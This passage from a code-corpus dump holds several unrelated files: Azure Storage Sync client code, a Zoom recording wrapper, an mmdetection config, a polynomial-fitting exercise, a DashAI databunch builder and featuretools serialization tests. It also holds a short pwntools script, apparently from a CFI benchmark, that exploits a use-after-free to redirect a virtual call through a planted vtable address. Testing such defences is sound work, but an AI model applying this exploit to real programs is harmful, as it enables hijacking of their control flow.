response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageSyncError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
response_headers = {}
if response.status_code == 200:
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-correlation-request-id']=self._deserialize('str', response.headers.get('x-ms-correlation-request-id'))
if response.status_code == 202:
response_headers['Location']=self._deserialize('str', response.headers.get('Location'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-correlation-request-id']=self._deserialize('str', response.headers.get('x-ms-correlation-request-id'))
if cls:
return cls(pipeline_response, None, response_headers)
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.StorageSync/storageSyncServices/{storageSyncServiceName}/registeredServers/{serverId}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
storage_sync_service_name: str,
server_id: str,
**kwargs
) -> AsyncLROPoller[None]:
"""Delete the given registered server.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param storage_sync_service_name: Name of Storage Sync Service resource.
:type storage_sync_service_name: str
:param server_id: GUID identifying the on-premises server.
:type server_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
storage_sync_service_name=storage_sync_service_name,
server_id=server_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'storageSyncServiceName': self._serialize.url("storage_sync_service_name", storage_sync_service_name, 'str'),
'serverId': self._serialize.url("server_id", server_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.StorageSync/storageSyncServices/{storageSyncServiceName}/registeredServers/{serverId}'} # type: ignore
async def _trigger_rollover_initial(
self,
resource_group_name: str,
storage_sync_service_name: str,
server_id: str,
parameters: "_models.TriggerRolloverRequest",
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._trigger_rollover_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'storageSyncServiceName': self._serialize.url("storage_sync_service_name", storage_sync_service_name, 'str'),
'serverId': self._serialize.url("server_id", server_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'TriggerRolloverRequest')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageSyncError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
response_headers = {}
if response.status_code == 200:
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-correlation-request-id']=self._deserialize('str', response.headers.get('x-ms-correlation-request-id'))
if response.status_code == 202:
response_headers['Location']=self._deserialize('str', response.headers.get('Location'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-correlation-request-id']=self._deserialize('str', response.headers.get('x-ms-correlation-request-id'))
if cls:
return cls(pipeline_response, None, response_headers)
_trigger_rollover_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.StorageSync/storageSyncServices/{storageSyncServiceName}/registeredServers/{serverId}/triggerRollover'} # type: ignore
async def begin_trigger_rollover(
self,
resource_group_name: str,
storage_sync_service_name: str,
server_id: str,
parameters: "_models.TriggerRolloverRequest",
**kwargs
) -> AsyncLROPoller[None]:
"""Triggers Server certificate rollover.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param storage_sync_service_name: Name of Storage Sync Service resource.
:type storage_sync_service_name: str
:param server_id: Server Id.
:type server_id: str
:param parameters: Body of Trigger Rollover request.
:type parameters: ~azure.mgmt.storagesync.models.TriggerRolloverRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._trigger_rollover_initial(
resource_group_name=resource_group_name,
storage_sync_service_name=storage_sync_service_name,
server_id=server_id,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'storageSyncServiceName': self._serialize.url("storage_sync_service_name", storage_sync_service_name, 'str'),
'serverId': self._serialize.url("server_id", server_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_trigger_rollover.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.StorageSync/storageSyncServices/{storageSyncServiceName}/registeredServers/{serverId}/triggerRollover'} # type: ignore
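# A hedged usage sketch, not generated code: the resource names are
# placeholders and the client is assumed to be an already-authenticated
# azure.mgmt.storagesync.aio client that exposes this operation group as
# `registered_servers`.
async def example_register_server(client, parameters):
    poller = await client.registered_servers.begin_create(
        resource_group_name="example-rg",
        storage_sync_service_name="example-sync-service",
        server_id="00000000-0000-0000-0000-000000000000",
        parameters=parameters,
    )
    # begin_create returns an AsyncLROPoller; awaiting result() yields the
    # final RegisteredServer built by get_long_running_output above.
    return await poller.result()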
| 54.114286
| 256
| 0.677775
|
a1c9182828de1979359bb4726296393b868639a7
| 1,243
|
py
|
Python
|
aiozoom/components/recording.py
|
vladisa88/aiozoom
|
5000827650d27c826e895b1b9691377111b3ef6b
|
[
"MIT"
] | 2
|
2021-02-09T10:40:50.000Z
|
2021-02-19T07:53:26.000Z
|
aiozoom/components/recording.py
|
vladisa88/aiozoom
|
5000827650d27c826e895b1b9691377111b3ef6b
|
[
"MIT"
] | null | null | null |
aiozoom/components/recording.py
|
vladisa88/aiozoom
|
5000827650d27c826e895b1b9691377111b3ef6b
|
[
"MIT"
] | null | null | null |
from aiozoom.components.base import Base
class Recording(Base):
"""
Class describing the `Recording` logic of the Zoom API.
Learn more:
https://marketplace.zoom.us/docs/api-reference/zoom-api/cloud-recording/
"""
async def get_recording(self, meeting_id: str) -> dict:
"""
Get meeting's recording information.
"""
method = f'/meetings/{meeting_id}/recordings'
return await self.base_get_request(method)
async def list_recordings(self, email: str) -> dict:
"""
List all cloud recordings related to a user.
"""
method = f'/users/{email}/recordings'
return await self.base_get_request(method)
async def delete_all_recording_files(self, meeting_id: str) -> dict:
"""
Delete all recording files of a meeting.
"""
method = f'/meetings/{meeting_id}/recordings'
return await self.base_delete_request(method)
async def delete_recording_file(
self, meeting_id: str, recording_id: str) -> dict:
"""
Delete a specific recording file from a meeting.
"""
method = f'/meetings/{meeting_id}/recordings/{recording_id}'
return await self.base_delete_request(method)
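# A hedged usage sketch, not part of the library: constructing a Recording
# instance (credentials, session handling) depends on aiozoom's Base class,
# so the instance is taken as an argument. The 'recording_files'/'id' keys
# follow Zoom's cloud-recording response schema and are an assumption here.
async def example_prune_meeting(recording: Recording, meeting_id: str) -> None:
    info = await recording.get_recording(meeting_id)
    for recording_file in info.get('recording_files', []):
        await recording.delete_recording_file(meeting_id, recording_file['id'])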
| 31.871795
| 76
| 0.641191
|
bc66fa4b05d98fe77c61ec138056961f93eeb27f
| 351
|
py
|
Python
|
configs/dota_1.5/hbb/retinanet_r50_fpn_1x_dota1.5.py
|
liuyanyi/mmdetection
|
d2003536af6f08cb9bd7a75e0444eef03ace4bb3
|
[
"Apache-2.0"
] | null | null | null |
configs/dota_1.5/hbb/retinanet_r50_fpn_1x_dota1.5.py
|
liuyanyi/mmdetection
|
d2003536af6f08cb9bd7a75e0444eef03ace4bb3
|
[
"Apache-2.0"
] | null | null | null |
configs/dota_1.5/hbb/retinanet_r50_fpn_1x_dota1.5.py
|
liuyanyi/mmdetection
|
d2003536af6f08cb9bd7a75e0444eef03ace4bb3
|
[
"Apache-2.0"
] | null | null | null |
_base_ = [
'../../_base_/models/retinanet_r50_fpn.py',
'../../_base_/datasets/dota_detection_v1.5_hbb.py',
'../../_base_/schedules/schedule_2x.py', '../../_base_/default_runtime.py'
]
model = dict(
bbox_head=dict(
num_classes=16,
)
)
optimizer = dict(lr=0.01)
work_dir = './work_dirs/retinanet_r50_fpn_1x_dota'
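# A hedged usage note (the mmcv tooling below is an assumption about the
# surrounding mmdetection workflow, not part of this config):
# from mmcv import Config
# cfg = Config.fromfile('configs/dota_1.5/hbb/retinanet_r50_fpn_1x_dota1.5.py')
# print(cfg.model.bbox_head.num_classes)  # merged with the _base_ files -> 16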
| 25.071429
| 78
| 0.62963
|
8b8c0fa46dbd651a24431464ff14b52aeacb4abb
| 553
|
py
|
Python
|
cbench/virtual_call/vtable_reuse_uaf.py
|
vul337/cfi-eval
|
7d7801cf44cc650127d692c2a7222434375ac6aa
|
[
"Apache-2.0"
] | 16
|
2020-11-17T08:17:10.000Z
|
2022-03-16T07:47:44.000Z
|
cbench/virtual_call/vtable_reuse_uaf.py
|
vul337/cfi-eval
|
7d7801cf44cc650127d692c2a7222434375ac6aa
|
[
"Apache-2.0"
] | null | null | null |
cbench/virtual_call/vtable_reuse_uaf.py
|
vul337/cfi-eval
|
7d7801cf44cc650127d692c2a7222434375ac6aa
|
[
"Apache-2.0"
] | 4
|
2020-12-13T10:44:30.000Z
|
2021-12-20T13:34:37.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"
r = process('./vtable_reuse_uaf')
def usenote():
r.recvuntil("4. exit\n")
r.sendline("1")
def afternote(_len,_data):
r.recvuntil("4. exit\n")
r.sendline("2")
r.recvuntil("len:")
r.sendline(_len)
r.recvuntil("data:")
r.sendline(_data)
def freenote():
r.recvuntil("4. exit\n")
r.sendline("3")
# Set the vulnerable vtable address for the target binary here
vtable_add = 0x401b10
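# A hedged alternative, not in the original PoC: resolve the vtable address
# from the binary's symbol table with pwntools instead of hard-coding it. The
# mangled symbol name below is a placeholder and depends on the target class.
def lookup_vtable(path='./vtable_reuse_uaf', symbol='_ZTV8Reusable', fallback=0x401b10):
    elf = ELF(path)  # ELF is available via `from pwn import *`
    return elf.symbols.get(symbol, fallback)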
freenote()
afternote("48",p64(vtable_add))
usenote()
r.interactive()
| 15.8
| 33
| 0.629295
|
be0a00ab69c8436198704dbd8236ce8831555e5f
| 613
|
py
|
Python
|
utils/config.py
|
recogni/tf-hrnet
|
1f21d9b86211de480f01ca1fda2f58e427e93261
|
[
"BSD-3-Clause"
] | 83
|
2019-08-19T08:40:35.000Z
|
2022-03-31T11:00:21.000Z
|
utils/config.py
|
Alabenba/tf-hrnet
|
949beb420d4a1af9974700534906184909e219ea
|
[
"BSD-3-Clause"
] | 14
|
2019-09-02T09:03:32.000Z
|
2022-02-09T23:32:18.000Z
|
netutils/config.py
|
sramirez/hrnet-pose-tf
|
5b7498d5fc86e18171f45ee6acfacbfea34a2339
|
[
"BSD-3-Clause"
] | 21
|
2019-08-20T02:38:55.000Z
|
2022-01-05T07:13:31.000Z
|
import configparser
import ast
def load_net_cfg_from_file(cfgfile):
def load_from_options(section, cfg):
options = dict()
xdict = dict(cfg.items(section))
for key, value in xdict.items():
try:
value = ast.literal_eval(value)
except (ValueError, SyntaxError):
# ast.literal_eval failed, so keep the raw option string
pass
options[key] = value
return options
cfg = configparser.ConfigParser()
cfg.read(cfgfile)
sections = cfg.sections()
options = dict()
for _section in sections:
options[_section] = load_from_options(_section, cfg)
return options
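# A hedged, self-contained demo, not part of the original utils: it writes a
# small made-up config to a temporary file and shows that numeric and list
# option values come back as Python objects thanks to ast.literal_eval.
if __name__ == '__main__':
    import os
    import tempfile
    demo_cfg = "[net]\nnum_layers = 4\nchannels = [18, 36, 72, 144]\n"
    with tempfile.NamedTemporaryFile('w', suffix='.cfg', delete=False) as handle:
        handle.write(demo_cfg)
        demo_path = handle.name
    options = load_net_cfg_from_file(demo_path)
    assert options['net']['num_layers'] == 4
    assert options['net']['channels'] == [18, 36, 72, 144]
    os.remove(demo_path)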
| 23.576923
| 60
| 0.598695
|
eaa619295d266558568d47f73256caf95bb64bc0
| 1,053
|
py
|
Python
|
Autonomous Work/AutonomousWork_2/Question4.py
|
Aujasvi-Moudgil/Classification-and-Representation-Learning
|
0ceb461f82d3d92f7d183fa7c8f61e20d53cfb52
|
[
"MIT"
] | null | null | null |
Autonomous Work/AutonomousWork_2/Question4.py
|
Aujasvi-Moudgil/Classification-and-Representation-Learning
|
0ceb461f82d3d92f7d183fa7c8f61e20d53cfb52
|
[
"MIT"
] | null | null | null |
Autonomous Work/AutonomousWork_2/Question4.py
|
Aujasvi-Moudgil/Classification-and-Representation-Learning
|
0ceb461f82d3d92f7d183fa7c8f61e20d53cfb52
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Sun Oct 8 13:55:10 2017
@author: Aujasvi
"""
from numpy import *
import matplotlib.pyplot as plt
#Load the dataset
data = loadtxt('polynome.data')
# Separate the input from the output
X = data[:, 0]
Y = data[:, 1]
# Splitting the data into training & test data
X_train_data = X[:int((len(X))*.70)]
X_test_data = X[int(len(X)*.70):]
Y_train_data = Y[:int((len(Y))*.70)]
Y_test_data = Y[int(len(Y)*.70):]
print('X_train_data :', X_train_data)
print('X_test_data :', X_test_data)
print('Y_train_data :', Y_train_data)
print('Y_test_data :',Y_test_data)
for order in range(1,21):
w = polyfit(X_train_data,Y_train_data,order)
y = polyval (w,X_test_data)
# Generalization error on the test set
mse = ((Y_test_data-y)**2).mean(axis=None)
print('order='+str(order)+', mse='+str(mse))
# In case of overfitting, the training error is low while the test error is high.
# For order 4 the test error is at its minimum and the model generalizes well, but as we
# increase the degree of the polynomial, the curve tends to overfit.
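# A hedged extension of the same experiment, not in the original script: it
# also tracks the training error so the gap described above (low train error,
# high test error once the polynomial degree grows) can be plotted directly.
train_errors, test_errors = [], []
for order in range(1, 21):
    w = polyfit(X_train_data, Y_train_data, order)
    train_errors.append(((Y_train_data - polyval(w, X_train_data)) ** 2).mean())
    test_errors.append(((Y_test_data - polyval(w, X_test_data)) ** 2).mean())
plt.plot(range(1, 21), train_errors, label='train MSE')
plt.plot(range(1, 21), test_errors, label='test MSE')
plt.xlabel('polynomial order')
plt.ylabel('MSE')
plt.legend()
plt.show()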
| 28.459459
| 83
| 0.690408
|
35698d18f457f905c436b4433f0d40e293fbe3ac
| 2,393
|
py
|
Python
|
collabfilter/databunch.py
|
manikyabard/DashAI
|
723f4c4ced3838e2872ec27848950f92c6c79b3e
|
[
"Apache-2.0"
] | 7
|
2020-08-26T09:36:54.000Z
|
2021-12-21T15:46:32.000Z
|
collabfilter/databunch.py
|
JoeRishon/DashAI
|
68d1b01088a65e2062d96b47b083fa8f5c82b27c
|
[
"Apache-2.0"
] | 16
|
2020-08-25T18:44:45.000Z
|
2022-03-25T19:12:36.000Z
|
collabfilter/databunch.py
|
JoeRishon/DashAI
|
68d1b01088a65e2062d96b47b083fa8f5c82b27c
|
[
"Apache-2.0"
] | 10
|
2020-09-30T19:27:17.000Z
|
2021-04-04T14:50:31.000Z
|
from fastai.collab import *
from core.databunch import DashDatabunch
class DashCollabDatabunch:
"""
Base DataBunch for collaborative filtering.
"""
@staticmethod
def create_collab_databunch(response):
"""
Creates a databunch for collaborative filtering using the values specified in response/DashUI.
Uses the csv name given in response>collab>input to create the input dataframe.
Creates a cat list using the user name and item name provided in the data.
Applies the required transformations and creates a collab list using the specified cat list.
The collab list is split into training and validation sets using the specified method and then labelled.
Finally it is converted to a databunch object and returned.
"""
path = Path('./')
# Step 1: Provide inputs
response_col = response['collab']
df = pd.read_csv(path / f'{response_col["input"]["csv_name"]}')
procs = list()
if response_col["transform"]['FillMissing']:
if hasattr(FillStrategy, f"{response_col['transform']['FillMissing']['fill_strategy']}"):
fill_strategy = getattr(FillStrategy, f"{response_col['transform']['FillMissing']['fill_strategy']}")
procs.append(partial(FillMissing, fill_strategy=fill_strategy,
fill_val=response_col['transform']['FillMissing']['fill_val'],
add_col=response_col['transform']['FillMissing']['add_col']))
if response_col['transform']['Categorify']:
procs.append(Categorify)
if response_col['transform']['Normalize']:
procs.append(Normalize)
procs = listify(procs)
user_name = response_col['input']['user_name']
item_name = response_col['input']['item_name']
rating = response_col['input']['rating']
cat_names = [user_name, item_name]
src = CollabList.from_df(df, cat_names=cat_names, procs=procs)
src = DashDatabunch.split_databunch(response, src)
# src = DashDatabunch.label_databunch(response, src)
# src=src.split_by_rand_pct(valid_pct=0.2,seed=None)
src = src.label_from_df(cols=rating)
# if test is not None: src.add_test(CollabList.from_df(test, cat_names=cat_names))
if response["collab"]["input"]['test_df']["has_test"]:
test_df = pd.read_csv(path / f"{response['collab']['input']['test_df']['csv_name']}")
src.add_test(CollabList.from_df(test_df, cat_names=cat_names))
return DashDatabunch.create_databunch(response, src)
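# A hedged sketch of the `response` dictionary shape this method reads,
# reconstructed from the keys accessed above; the exact schema emitted by
# DashUI (and any keys consumed by DashDatabunch.split_databunch) may differ.
EXAMPLE_COLLAB_RESPONSE = {
    'collab': {
        'input': {
            'csv_name': 'ratings.csv',
            'user_name': 'userId',
            'item_name': 'movieId',
            'rating': 'rating',
            'test_df': {'has_test': False, 'csv_name': ''},
        },
        'transform': {
            'FillMissing': {'fill_strategy': 'MEDIAN', 'fill_val': 0, 'add_col': False},
            'Categorify': True,
            'Normalize': False,
        },
    },
}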
| 41.982456
| 107
| 0.72127
|
c99e8a9b2a001df22e5de8465191094aa37e6bd6
| 18,343
|
py
|
Python
|
featuretools/tests/entityset_tests/test_serialization.py
|
ridicolos/featuretools
|
0af409da206e0b691ec64a3e0e618a43f1701dd9
|
[
"BSD-3-Clause"
] | 942
|
2020-11-10T02:59:39.000Z
|
2022-03-31T16:34:33.000Z
|
featuretools/tests/entityset_tests/test_serialization.py
|
167rgc911/featuretools
|
bbad3f7392b203b7b9c250a93465052e7fc06bbc
|
[
"BSD-3-Clause"
] | 721
|
2020-11-09T23:12:06.000Z
|
2022-03-31T22:33:35.000Z
|
featuretools/tests/entityset_tests/test_serialization.py
|
167rgc911/featuretools
|
bbad3f7392b203b7b9c250a93465052e7fc06bbc
|
[
"BSD-3-Clause"
] | 127
|
2020-11-10T10:12:30.000Z
|
2022-03-27T08:55:05.000Z
|
import json
import logging
import os
import tempfile
from urllib.request import urlretrieve
import boto3
import pandas as pd
import pytest
import woodwork.type_sys.type_system as ww_type_system
from woodwork.logical_types import Datetime, LogicalType, Ordinal
from woodwork.serialize import typing_info_to_dict
from woodwork.type_sys.utils import list_logical_types
from featuretools.entityset import EntitySet, deserialize, serialize
from featuretools.entityset.serialize import SCHEMA_VERSION
from featuretools.tests.testing_utils import to_pandas
from featuretools.utils.gen_utils import Library
BUCKET_NAME = "test-bucket"
WRITE_KEY_NAME = "test-key"
TEST_S3_URL = "s3://{}/{}".format(BUCKET_NAME, WRITE_KEY_NAME)
TEST_FILE = "test_serialization_data_entityset_schema_{}_2021_8_31.tar".format(SCHEMA_VERSION)
S3_URL = "s3://featuretools-static/" + TEST_FILE
URL = "https://featuretools-static.s3.amazonaws.com/" + TEST_FILE
TEST_KEY = "test_access_key_es"
def test_entityset_description(es):
description = serialize.entityset_to_description(es)
_es = deserialize.description_to_entityset(description)
assert es.metadata.__eq__(_es, deep=True)
def test_all_ww_logical_types():
logical_types = list_logical_types()['type_string'].to_list()
dataframe = pd.DataFrame(columns=logical_types)
es = EntitySet()
ltype_dict = {ltype: ltype for ltype in logical_types}
ltype_dict['ordinal'] = Ordinal(order=[])
es.add_dataframe(dataframe=dataframe, dataframe_name='all_types', index='integer', logical_types=ltype_dict)
description = serialize.entityset_to_description(es)
_es = deserialize.description_to_entityset(description)
assert es.__eq__(_es, deep=True)
def test_with_custom_ww_logical_type():
class CustomLogicalType(LogicalType):
pass
ww_type_system.add_type(CustomLogicalType)
columns = ['integer', 'natural_language', 'custom_logical_type']
dataframe = pd.DataFrame(columns=columns)
es = EntitySet()
ltype_dict = {
'integer': 'integer',
'natural_language': 'natural_language',
'custom_logical_type': CustomLogicalType,
}
es.add_dataframe(dataframe=dataframe, dataframe_name='custom_type', index='integer', logical_types=ltype_dict)
description = serialize.entityset_to_description(es)
_es = deserialize.description_to_entityset(description)
assert isinstance(_es['custom_type'].ww.logical_types['custom_logical_type'], CustomLogicalType)
assert es.__eq__(_es, deep=True)
def test_serialize_invalid_formats(es, tmpdir):
error_text = 'must be one of the following formats: {}'
error_text = error_text.format(', '.join(serialize.FORMATS))
with pytest.raises(ValueError, match=error_text):
serialize.write_data_description(es, path=str(tmpdir), format='')
def test_empty_dataframe(es):
for df in es.dataframes:
description = typing_info_to_dict(df)
dataframe = deserialize.empty_dataframe(description)
assert dataframe.empty
assert all(dataframe.columns == df.columns)
def test_to_csv(es, tmpdir):
es.to_csv(str(tmpdir), encoding='utf-8', engine='python')
new_es = deserialize.read_entityset(str(tmpdir))
assert es.__eq__(new_es, deep=True)
df = to_pandas(es['log'], index='id')
new_df = to_pandas(new_es['log'], index='id')
assert type(df['latlong'][0]) in (tuple, list)
assert type(new_df['latlong'][0]) in (tuple, list)
# Dask/Koalas don't support auto setting of interesting values with es.add_interesting_values()
def test_to_csv_interesting_values(pd_es, tmpdir):
pd_es.add_interesting_values()
pd_es.to_csv(str(tmpdir))
new_es = deserialize.read_entityset(str(tmpdir))
assert pd_es.__eq__(new_es, deep=True)
def test_to_csv_manual_interesting_values(es, tmpdir):
es.add_interesting_values(dataframe_name='log', values={'product_id': ['coke_zero']})
es.to_csv(str(tmpdir))
new_es = deserialize.read_entityset(str(tmpdir))
assert es.__eq__(new_es, deep=True)
assert new_es['log'].ww['product_id'].ww.metadata['interesting_values'] == ['coke_zero']
# Dask/Koalas do not support to_pickle
def test_to_pickle(pd_es, tmpdir):
pd_es.to_pickle(str(tmpdir))
new_es = deserialize.read_entityset(str(tmpdir))
assert pd_es.__eq__(new_es, deep=True)
assert type(pd_es['log']['latlong'][0]) == tuple
assert type(new_es['log']['latlong'][0]) == tuple
def test_to_pickle_errors_dask(dask_es, tmpdir):
msg = 'DataFrame type not compatible with pickle serialization. Please serialize to another format.'
with pytest.raises(ValueError, match=msg):
dask_es.to_pickle(str(tmpdir))
def test_to_pickle_errors_koalas(ks_es, tmpdir):
msg = 'DataFrame type not compatible with pickle serialization. Please serialize to another format.'
with pytest.raises(ValueError, match=msg):
ks_es.to_pickle(str(tmpdir))
# Dask/Koalas do not support to_pickle
def test_to_pickle_interesting_values(pd_es, tmpdir):
pd_es.add_interesting_values()
pd_es.to_pickle(str(tmpdir))
new_es = deserialize.read_entityset(str(tmpdir))
assert pd_es.__eq__(new_es, deep=True)
# Dask/Koalas do not support to_pickle
def test_to_pickle_manual_interesting_values(pd_es, tmpdir):
pd_es.add_interesting_values(dataframe_name='log', values={'product_id': ['coke_zero']})
pd_es.to_pickle(str(tmpdir))
new_es = deserialize.read_entityset(str(tmpdir))
assert pd_es.__eq__(new_es, deep=True)
assert new_es['log'].ww['product_id'].ww.metadata['interesting_values'] == ['coke_zero']
def test_to_parquet(es, tmpdir):
es.to_parquet(str(tmpdir))
new_es = deserialize.read_entityset(str(tmpdir))
assert es.__eq__(new_es, deep=True)
df = to_pandas(es['log'])
new_df = to_pandas(new_es['log'])
assert type(df['latlong'][0]) in (tuple, list)
assert type(new_df['latlong'][0]) in (tuple, list)
def test_to_parquet_manual_interesting_values(es, tmpdir):
es.add_interesting_values(dataframe_name='log', values={'product_id': ['coke_zero']})
es.to_parquet(str(tmpdir))
new_es = deserialize.read_entityset(str(tmpdir))
assert es.__eq__(new_es, deep=True)
assert new_es['log'].ww['product_id'].ww.metadata['interesting_values'] == ['coke_zero']
# Dask/Koalas don't support auto setting of interesting values with es.add_interesting_values()
def test_to_parquet_interesting_values(pd_es, tmpdir):
pd_es.add_interesting_values()
pd_es.to_parquet(str(tmpdir))
new_es = deserialize.read_entityset(str(tmpdir))
assert pd_es.__eq__(new_es, deep=True)
def test_to_parquet_with_lti(tmpdir, pd_mock_customer):
es = pd_mock_customer
es.to_parquet(str(tmpdir))
new_es = deserialize.read_entityset(str(tmpdir))
assert es.__eq__(new_es, deep=True)
def test_to_pickle_id_none(tmpdir):
es = EntitySet()
es.to_pickle(str(tmpdir))
new_es = deserialize.read_entityset(str(tmpdir))
assert es.__eq__(new_es, deep=True)
# TODO: Fix Moto tests needing to explicitly set permissions for objects
@pytest.fixture
def s3_client():
_environ = os.environ.copy()
from moto import mock_s3
with mock_s3():
s3 = boto3.resource('s3')
yield s3
os.environ.clear()
os.environ.update(_environ)
@pytest.fixture
def s3_bucket(s3_client):
s3_client.create_bucket(Bucket=BUCKET_NAME, ACL='public-read-write')
s3_bucket = s3_client.Bucket(BUCKET_NAME)
yield s3_bucket
def make_public(s3_client, s3_bucket):
obj = list(s3_bucket.objects.all())[0].key
s3_client.ObjectAcl(BUCKET_NAME, obj).put(ACL='public-read-write')
# TODO: tmp file disappears after deserialize step, cannot check equality with Dask, Koalas
def test_serialize_s3_csv(es, s3_client, s3_bucket):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail('tmp file disappears after deserialize step, cannot check equality with Dask')
es.to_csv(TEST_S3_URL, encoding='utf-8', engine='python')
make_public(s3_client, s3_bucket)
new_es = deserialize.read_entityset(TEST_S3_URL)
assert es.__eq__(new_es, deep=True)
# Dask and Koalas do not support to_pickle
def test_serialize_s3_pickle(pd_es, s3_client, s3_bucket):
pd_es.to_pickle(TEST_S3_URL)
make_public(s3_client, s3_bucket)
new_es = deserialize.read_entityset(TEST_S3_URL)
assert pd_es.__eq__(new_es, deep=True)
# TODO: tmp file disappears after deserialize step, cannot check equality with Dask, Koalas
def test_serialize_s3_parquet(es, s3_client, s3_bucket):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail('tmp file disappears after deserialize step, cannot check equality with Dask or Koalas')
es.to_parquet(TEST_S3_URL)
make_public(s3_client, s3_bucket)
new_es = deserialize.read_entityset(TEST_S3_URL)
assert es.__eq__(new_es, deep=True)
